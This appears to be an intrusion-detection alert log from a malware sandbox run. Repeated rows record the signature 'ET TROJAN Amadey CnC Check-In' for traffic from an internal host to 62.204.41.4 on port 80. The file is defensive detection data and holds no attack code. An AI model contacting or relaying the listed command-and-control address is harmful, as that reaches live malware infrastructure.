192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49990	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262	TCP	2027700	ET TROJAN Amadey CnC Check-In	50085	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50183	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50281	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724	TCP	2027700	ET TROJAN Amadey CnC Check-In	50094	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545	TCP	2027700	ET TROJAN Amadey CnC Check-In	50447	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549	TCP	2027700	ET TROJAN Amadey CnC Check-In	50192	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528	TCP	2027700	ET TROJAN Amadey CnC Check-In	50349	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50419	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765	TCP	2027700	ET TROJAN Amadey CnC Check-In	50422	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990	TCP	2027700	ET TROJAN Amadey CnC Check-In	49803	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533	TCP	2027700	ET TROJAN Amadey CnC Check-In	49901	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50324	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775	TCP	2027700	ET TROJAN Amadey CnC Check-In	50189	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273	TCP	2027700	ET TROJAN Amadey CnC Check-In	50413	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225	TCP	2027700	ET TROJAN Amadey CnC Check-In	49959	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637	TCP	2027700	ET TROJAN Amadey CnC Check-In	49793	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306	TCP	2027700	ET TROJAN Amadey CnC Check-In	50221	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632	TCP	2027700	ET TROJAN Amadey CnC Check-In	49732	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624	TCP	2027700	ET TROJAN Amadey CnC Check-In	49986	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069	TCP	2027700	ET TROJAN Amadey CnC Check-In	50351	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50155	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459	TCP	2027700	ET TROJAN Amadey CnC Check-In	50380	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49897	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142	TCP	2027700	ET TROJAN Amadey CnC Check-In	49856	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147	TCP	2027700	ET TROJAN Amadey CnC Check-In	50114	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50310	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50368	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507	TCP	2027700	ET TROJAN Amadey CnC Check-In	50025	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302	TCP	2027700	ET TROJAN Amadey CnC Check-In	50066	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061	TCP	2027700	ET TROJAN Amadey CnC Check-In	50262	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50279	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50475	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49917	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118	TCP	2027700	ET TROJAN Amadey CnC Check-In	49822	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616	TCP	2027700	ET TROJAN Amadey CnC Check-In	49958	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543	TCP	2027700	ET TROJAN Amadey CnC Check-In	50209	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463	TCP	2027700	ET TROJAN Amadey CnC Check-In	49828	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423	TCP	2027700	ET TROJAN Amadey CnC Check-In	49733	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662	TCP	2027700	ET TROJAN Amadey CnC Check-In	49863	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50352	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618	TCP	2027700	ET TROJAN Amadey CnC Check-In	49774	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49987	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50441	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460	TCP	2027700	ET TROJAN Amadey CnC Check-In	49875	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50142	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49872	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085	TCP	2027700	ET TROJAN Amadey CnC Check-In	49777	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970	TCP	2027700	ET TROJAN Amadey CnC Check-In	50240	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968	TCP	2027700	ET TROJAN Amadey CnC Check-In	50396	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040	TCP	2027700	ET TROJAN Amadey CnC Check-In	49780	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797	TCP	2027700	ET TROJAN Amadey CnC Check-In	50139	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49869	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419	TCP	2027700	ET TROJAN Amadey CnC Check-In	49786	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917	TCP	2027700	ET TROJAN Amadey CnC Check-In	50323	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238	TCP	2027700	ET TROJAN Amadey CnC Check-In	50151	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50225	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959	TCP	2027700	ET TROJAN Amadey CnC Check-In	50479	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50053	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928	TCP	2027700	ET TROJAN Amadey CnC Check-In	50136	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144	TCP	2027700	ET TROJAN Amadey CnC Check-In	50234	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171	TCP	2027700	ET TROJAN Amadey CnC Check-In	50081	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138	TCP	2027700	ET TROJAN Amadey CnC Check-In	49933	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848	TCP	2027700	ET TROJAN Amadey CnC Check-In	49749	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894	TCP	2027700	ET TROJAN Amadey CnC Check-In	49942	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50463	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308	TCP	2027700	ET TROJAN Amadey CnC Check-In	49847	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925	TCP	2027700	ET TROJAN Amadey CnC Check-In	49844	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822	TCP	2027700	ET TROJAN Amadey CnC Check-In	49761	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825	TCP	2027700	ET TROJAN Amadey CnC Check-In	50253	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124	TCP	2027700	ET TROJAN Amadey CnC Check-In	49891	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099	TCP	2027700	ET TROJAN Amadey CnC Check-In	49850	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710	TCP	2027700	ET TROJAN Amadey CnC Check-In	49888	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232	TCP	2027700	ET TROJAN Amadey CnC Check-In	50069	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49799	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842	TCP	2027700	ET TROJAN Amadey CnC Check-In	49758	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780	TCP	2027700	ET TROJAN Amadey CnC Check-In	50040	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375	TCP	2027700	ET TROJAN Amadey CnC Check-In	50170	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245	TCP	2027700	ET TROJAN Amadey CnC Check-In	50294	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511	TCP	2027700	ET TROJAN Amadey CnC Check-In	50212	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349	TCP	2027700	ET TROJAN Amadey CnC Check-In	50466	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888	TCP	2027700	ET TROJAN Amadey CnC Check-In	50164	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50377	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50123	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930	TCP	2027700	ET TROJAN Amadey CnC Check-In	50308	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466	TCP	2027700	ET TROJAN Amadey CnC Check-In	50336	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816	TCP	2027700	ET TROJAN Amadey CnC Check-In	50206	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686	TCP	2027700	ET TROJAN Amadey CnC Check-In	50438	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746	TCP	2027700	ET TROJAN Amadey CnC Check-In	49819	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559	TCP	2027700	ET TROJAN Amadey CnC Check-In	49920	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49831	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50450	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540	TCP	2027700	ET TROJAN Amadey CnC Check-In	49961	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957	TCP	2027700	ET TROJAN Amadey CnC Check-In	49914	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50116	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631	TCP	2027700	ET TROJAN Amadey CnC Check-In	50468	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359	TCP	2027700	ET TROJAN Amadey CnC Check-In	49849	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651	TCP	2027700	ET TROJAN Amadey CnC Check-In	49754	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990	TCP	2027700	ET TROJAN Amadey CnC Check-In	50407	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521	TCP	2027700	ET TROJAN Amadey CnC Check-In	49950	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173	TCP	2027700	ET TROJAN Amadey CnC Check-In	50101	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331	TCP	2027700	ET TROJAN Amadey CnC Check-In	50257	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129	TCP	2027700	ET TROJAN Amadey CnC Check-In	50373	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50021	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936	TCP	2027700	ET TROJAN Amadey CnC Check-In	50079	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486	TCP	2027700	ET TROJAN Amadey CnC Check-In	49867	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605	TCP	2027700	ET TROJAN Amadey CnC Check-In	50195	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551	TCP	2027700	ET TROJAN Amadey CnC Check-In	49904	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388	TCP	2027700	ET TROJAN Amadey CnC Check-In	50229	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310	TCP	2027700	ET TROJAN Amadey CnC Check-In	50391	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221	TCP	2027700	ET TROJAN Amadey CnC Check-In	49782	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186	TCP	2027700	ET TROJAN Amadey CnC Check-In	50312	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505	TCP	2027700	ET TROJAN Amadey CnC Check-In	49960	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496	TCP	2027700	ET TROJAN Amadey CnC Check-In	49885	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562	TCP	2027700	ET TROJAN Amadey CnC Check-In	50330	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207	TCP	2027700	ET TROJAN Amadey CnC Check-In	49983	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516	TCP	2027700	ET TROJAN Amadey CnC Check-In	50134	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669	TCP	2027700	ET TROJAN Amadey CnC Check-In	50190	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758	TCP	2027700	ET TROJAN Amadey CnC Check-In	50285	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252	TCP	2027700	ET TROJAN Amadey CnC Check-In	49922	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869	TCP	2027700	ET TROJAN Amadey CnC Check-In	50126	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969	TCP	2027700	ET TROJAN Amadey CnC Check-In	49726	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196	TCP	2027700	ET TROJAN Amadey CnC Check-In	49839	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50089	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669	TCP	2027700	ET TROJAN Amadey CnC Check-In	50167	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883	TCP	2027700	ET TROJAN Amadey CnC Check-In	50322	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49744	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689	TCP	2027700	ET TROJAN Amadey CnC Check-In	50363	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091	TCP	2027700	ET TROJAN Amadey CnC Check-In	50345	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804	TCP	2027700	ET TROJAN Amadey CnC Check-In	49940	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383	TCP	2027700	ET TROJAN Amadey CnC Check-In	50304	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522	TCP	2027700	ET TROJAN Amadey CnC Check-In	50340	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291	TCP	2027700	ET TROJAN Amadey CnC Check-In	50185	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071	TCP	2027700	ET TROJAN Amadey CnC Check-In	49721	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124	TCP	2027700	ET TROJAN Amadey CnC Check-In	50144	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098	TCP	2027700	ET TROJAN Amadey CnC Check-In	50476	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879	TCP	2027700	ET TROJAN Amadey CnC Check-In	50435	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311	TCP	2027700	ET TROJAN Amadey CnC Check-In	50239	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686	TCP	2027700	ET TROJAN Amadey CnC Check-In	50180	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922	TCP	2027700	ET TROJAN Amadey CnC Check-In	49792	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50381	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216	TCP	2027700	ET TROJAN Amadey CnC Check-In	49816	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993	TCP	2027700	ET TROJAN Amadey CnC Check-In	49970	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774	TCP	2027700	ET TROJAN Amadey CnC Check-In	50458	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945	TCP	2027700	ET TROJAN Amadey CnC Check-In	49857	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955	TCP	2027700	ET TROJAN Amadey CnC Check-In	50162	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321	TCP	2027700	ET TROJAN Amadey CnC Check-In	50417	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376	TCP	2027700	ET TROJAN Amadey CnC Check-In	50335	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664	TCP	2027700	ET TROJAN Amadey CnC Check-In	49973	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174	TCP	2027700	ET TROJAN Amadey CnC Check-In	50298	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50295	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644	TCP	2027700	ET TROJAN Amadey CnC Check-In	50038	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090	TCP	2027700	ET TROJAN Amadey CnC Check-In	50154	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176	TCP	2027700	ET TROJAN Amadey CnC Check-In	49887	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698	TCP	2027700	ET TROJAN Amadey CnC Check-In	49762	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665	TCP	2027700	ET TROJAN Amadey CnC Check-In	50090	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857	TCP	2027700	ET TROJAN Amadey CnC Check-In	50332	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173	TCP	2027700	ET TROJAN Amadey CnC Check-In	49930	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067	TCP	2027700	ET TROJAN Amadey CnC Check-In	50267	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892	TCP	2027700	ET TROJAN Amadey CnC Check-In	50409	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532	TCP	2027700	ET TROJAN Amadey CnC Check-In	50448	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280	TCP	2027700	ET TROJAN Amadey CnC Check-In	49826	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738	TCP	2027700	ET TROJAN Amadey CnC Check-In	49945	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145	TCP	2027700	ET TROJAN Amadey CnC Check-In	50157	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449	TCP	2027700	ET TROJAN Amadey CnC Check-In	49752	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134	TCP	2027700	ET TROJAN Amadey CnC Check-In	50111	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353	TCP	2027700	ET TROJAN Amadey CnC Check-In	50371	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063	TCP	2027700	ET TROJAN Amadey CnC Check-In	49829	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178	TCP	2027700	ET TROJAN Amadey CnC Check-In	50445	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663	TCP	2027700	ET TROJAN Amadey CnC Check-In	50259	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763	TCP	2027700	ET TROJAN Amadey CnC Check-In	50478	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146	TCP	2027700	ET TROJAN Amadey CnC Check-In	49790	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501	TCP	2027700	ET TROJAN Amadey CnC Check-In	50129	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50152	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351	TCP	2027700	ET TROJAN Amadey CnC Check-In	50193	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49741	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570	TCP	2027700	ET TROJAN Amadey CnC Check-In	50437	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089	TCP	2027700	ET TROJAN Amadey CnC Check-In	49818	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998	TCP	2027700	ET TROJAN Amadey CnC Check-In	49902	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822	TCP	2027700	ET TROJAN Amadey CnC Check-In	50011	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750	TCP	2027700	ET TROJAN Amadey CnC Check-In	49859	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718	TCP	2027700	ET TROJAN Amadey CnC Check-In	50230	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758	TCP	2027700	ET TROJAN Amadey CnC Check-In	50360	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391	TCP	2027700	ET TROJAN Amadey CnC Check-In	49724	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50052	80	192.168.2.6	62.204.41.4
